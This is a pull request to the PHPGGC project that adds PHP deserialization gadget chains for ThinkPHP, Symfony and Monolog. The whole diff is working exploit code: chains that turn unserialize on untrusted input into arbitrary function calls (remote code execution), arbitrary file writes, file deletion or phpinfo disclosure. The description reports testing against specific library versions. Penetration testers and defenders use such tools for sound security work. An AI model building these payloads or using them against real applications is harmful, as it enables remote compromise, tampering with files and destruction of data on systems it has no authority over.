### PR TITLE
Add chains for ThinkPHP, Monolog, Symfony

### DIFF
--- a/gadgetchains/Monolog/FW/2/chain.php
+++ b/gadgetchains/Monolog/FW/2/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Monolog;
 
 class FW2 extends \PHPGGC\GadgetChain\FileWrite
 {
-    public static $version = '3.0.0 <= 3.1.0+';
+    public static $version = '-2.0.0+';
     public static $vector = '__destruct';
     public static $author = 'CyanM0un';
 

--- a/gadgetchains/Monolog/FW/2/chain.php
+++ b/gadgetchains/Monolog/FW/2/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class FW2 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '3.0.0 <= 3.1.0+';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+        
+        return new \JakubOnderka\PhpParallelLint\FileWriter($data, $path);
+    }
+}

--- a/gadgetchains/Monolog/FW/2/gadgets.php
+++ b/gadgetchains/Monolog/FW/2/gadgets.php
@@ -1,0 +1,14 @@
+<?php
+
+namespace JakubOnderka\PhpParallelLint{
+    class FileWriter {
+        protected $logFile;
+        protected $buffer;
+
+        function __construct($data, $path)
+        {
+            $this->logFile = $path;
+            $this->buffer = $data;
+        }
+    }
+}

--- a/gadgetchains/Monolog/INFO/1/chain.php
+++ b/gadgetchains/Monolog/INFO/1/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Monolog;
 
 class INFO1 extends \PHPGGC\GadgetChain\PHPInfo
 {
-    public static $version = '2.0.0';
+    public static $version = '-2.0.0+';
     public static $vector = '__destruct';
     public static $author = 'CyanM0un';
 

--- a/gadgetchains/Monolog/INFO/1/chain.php
+++ b/gadgetchains/Monolog/INFO/1/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class INFO1 extends \PHPGGC\GadgetChain\PHPInfo
+{
+    public static $version = '2.0.0';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        return new \GuzzleHttp\Stream\FnStream();
+    }
+}

--- a/gadgetchains/Monolog/INFO/1/gadgets.php
+++ b/gadgetchains/Monolog/INFO/1/gadgets.php
@@ -1,0 +1,10 @@
+<?php
+namespace GuzzleHttp\Stream{
+    class FnStream{
+        public $_fn_close;
+
+        function __construct(){
+            $this->_fn_close = 'phpinfo';
+        }
+    }
+}

--- a/gadgetchains/Symfony/FD/1/chain.php
+++ b/gadgetchains/Symfony/FD/1/chain.php
@@ -1,0 +1,15 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class FD1 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '-3.4+';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        return new \Symfony\Component\Cache\Adapter\PhpFilesAdapter($parameters['remote_path']);
+    }
+}

--- a/gadgetchains/Symfony/FD/1/gadgets.php
+++ b/gadgetchains/Symfony/FD/1/gadgets.php
@@ -1,0 +1,10 @@
+<?php
+namespace Symfony\Component\Cache\Adapter{
+    class PhpFilesAdapter{
+        private $tmp;
+
+        function __construct($path){
+            $this->tmp = $path;
+        }
+    }
+}

--- a/gadgetchains/Symfony/RCE/7/chain.php
+++ b/gadgetchains/Symfony/RCE/7/chain.php
@@ -1,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Symfony;
+
+class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '-3.4+';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \Symfony\Component\Cache\Adapter\TagAwareAdapter($function,$parameter); 
+    }
+}

--- a/gadgetchains/Symfony/RCE/7/gadgets.php
+++ b/gadgetchains/Symfony/RCE/7/gadgets.php
@@ -1,0 +1,12 @@
+<?php
+namespace Symfony\Component\Cache\Adapter{
+    class TagAwareAdapter{
+        private $deferred;
+        private $getTagsByKey;
+
+        function __construct($function,$parameter){
+            $this->deferred = $parameter;
+            $this->getTagsByKey = $function;
+        }
+    }
+}

--- a/gadgetchains/ThinkPHP/RCE/3/chain.php
+++ b/gadgetchains/ThinkPHP/RCE/3/chain.php
@@ -1,0 +1,17 @@
+<?php
+
+namespace GadgetChain\ThinkPHP;
+
+class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '-6.0.1+';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return new \League\Flysystem\Cached\Storage\Psr6Cache($function, $parameter);
+    }
+}

--- a/gadgetchains/ThinkPHP/RCE/3/gadgets.php
+++ b/gadgetchains/ThinkPHP/RCE/3/gadgets.php
@@ -1,0 +1,44 @@
+<?php
+namespace League\Flysystem\Cached\Storage{
+    class Psr6Cache{
+        private $pool;
+        protected $autosave;
+        protected $key;
+
+        function __construct($function, $parameter)
+        {
+            $this->autosave = false;
+            $this->pool = new \League\Flysystem\Directory(0, $function, $parameter);
+            $this->key = ["anything"];  
+        }
+    }
+}
+
+namespace League\Flysystem{
+    class Directory{
+        protected $filesystem;
+        protected $path;
+
+        function __construct($id, $function, $parameter)
+        {
+            if ($id == 0){
+                $this->filesystem = new \League\Flysystem\Directory(1, $function, $parameter);
+                $this->path = "key";
+            }else{
+                $this->filesystem = new \think\Validate($function);
+                $this->path = $parameter;
+            }
+        }
+    }
+}
+
+namespace think{
+    class Validate{
+        protected $type;
+
+        function __construct($function)
+        {
+            $this->type = ["key"=>$function];
+        }
+    }
+}

--- a/gadgetchains/ThinkPHP/RCE/4/chain.php
+++ b/gadgetchains/ThinkPHP/RCE/4/chain.php
@@ -1,0 +1,17 @@
+<?php
+
+namespace GadgetChain\ThinkPHP;
+
+class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '-6.0.1+';
+    public static $vector = '__destruct';
+    public static $author = '???';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return new \think\model\Pivot(0, $function, $parameter);
+    }
+}

--- a/gadgetchains/ThinkPHP/RCE/4/gadgets.php
+++ b/gadgetchains/ThinkPHP/RCE/4/gadgets.php
@@ -1,0 +1,51 @@
+<?php
+namespace think\model\concern{
+    trait Attribute{
+        private $data;
+        private $withAttr;
+        protected $json;
+        protected $jsonAssoc;
+    }
+    trait ModelEvent{
+        protected $withEvent;
+    }
+}
+
+namespace think{
+
+    abstract class Model{
+        use \think\model\concern\Attribute;
+        use \think\model\concern\ModelEvent;
+
+        private $exists;
+        private $force;
+        private $lazySave;
+        protected $suffix;
+        private $data;
+        private $withAttr;
+        protected $json;
+        protected $jsonAssoc;
+        
+        function __construct($i,$func,$param){
+            $this->data = ["key"=>["key"=>$param]];
+            if($i == 0){
+                $this->exists = true;
+                $this->force = true;
+                $this->lazySave = true;
+                $this->withEvent = false;
+                $this->suffix = new \think\model\Pivot(1,$func,$param);
+            }else{
+                $this->jsonAssoc = true;
+                $this->withAttr = ["key"=>["key"=>$func]];
+                $this->json = ["key"];
+            }
+        }
+    }
+}
+
+namespace think\model{
+    use \think\Model;
+
+    class Pivot extends Model{
+    }
+}


### PR DESCRIPTION
Hi there,
the ThinkPHP/rce3:
![image](https://user-images.githubusercontent.com/75713958/204126377-91573f75-3e59-4a36-85c6-134f41726188.png)
(also works on test version 6.0.1
As for the ThinkPHP/rce4, using composer to test won't work out (because the middle step need a connection), we should build it up and add an entry manually.

the Monolog/fw2:
![image](https://user-images.githubusercontent.com/75713958/204126512-bf437b49-c28e-4897-8ac6-fc4f1a583063.png)
Monolog/info1:
![image](https://user-images.githubusercontent.com/75713958/204126526-44cd4cd5-2046-4f35-9c21-76711c6a5796.png)
all on the version 2.0.0

the Symfony/rce7:
![image](https://user-images.githubusercontent.com/75713958/204126555-04d7d759-98a2-46e3-8957-4a6fb5c70194.png)
Symfony/fd1:
![image](https://user-images.githubusercontent.com/75713958/204126569-0ff21fe3-fff5-499d-ba03-bd6e1f86307f.png)
so many versions so I didn't use the test-compatibility.py



